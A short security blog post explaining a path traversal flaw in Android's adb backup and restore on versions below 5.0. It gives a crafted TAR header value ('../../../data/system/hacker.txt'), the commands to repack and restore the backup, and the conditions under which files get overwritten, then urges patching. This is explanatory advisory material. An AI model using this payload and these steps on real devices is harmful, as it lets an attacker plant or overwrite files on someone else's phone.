Android Backup Path Traversal Attack

A vulnerability found by Imre Rad and reported almost 10 months ago came to light before a week. All the android devices running versions below 5.0 are vulnerable to the attack that we shall be discussing further.

ADB stands for Android Debug Bridge which is a command line interface used to communicate with your android device. Using ADB one can add files,views files, delete data,give certain system commands etc. One such command that is used widely is the backup command.  With adb backup a complete back up of your android device is created and stored on your computer. And with the adb restore  command user can restore the full backup when needed.

A vulnerability was found in the way debug bridge handles the storage and retrieval process of the backup. In ADB this process is handled by Backup Manager Service, when a backup is created it is stored with .TAR extension.

If the header of the TAR file is modified and given a path of a malicious file. Then when a backup is restored it the original file will be over written and user shall have a malicious file on the device. To have a better understanding an example is:

Original File Header Path:

Original Value

Apps/com.andriod.settings/foo

Changed Header:

Apps/com.andriod.settings/foo/../../../data/system/hacker.txt

Malicious Value

In the above example we have added  “../../” and the file path to the original header. 

To restore we need to first pack our .tar file with the following command:
java -jar abe.jar pack [tar filename][backup filename]

Our tar file packed

Now restore the backup with following command:
adb restore [filename]

Backup restore

Backup Restore Message in Device

Now on restoration of backup the malicious file will be loaded on to the system.

However there are certain pre conditions for the exploit to work :

• The header checksum must match.
• The partition on which the retrieval is taking place must be mounted as a writeable partition for e.g. /System would not work but /data would work as it is a writeable partition.
• The files will not overwrite if it owned by root. This is because the process which is restoring is running as the same user as the package and Andriod packages do not run.
• With the introduction of new system hardening process for ignoring non system agent packages in Andriod Open Source Project (AOSP) 4.3 it is not possible to overwrite the file in later versions. However is the device is running custom ROM or is rooted and running higher versions such as 4.4 or higher than mostly likely it is possible to overwrite the file.
• All the pre AOSP 4.3 versions are exploitable without any additional conditions. In this case it is possible to overwrite any file or package that is installed on the system.

Make sure that your devices have the latest patches and security policies installed onto them. We would also like to thank Imre & folks at exploit db for presenting us with such a beautiful exploit. If you have any queries feel free to write to us at info@securitytheorem.com or simply leave a comment below.

Soruce: https://www.exploit-db.com/exploits/36813/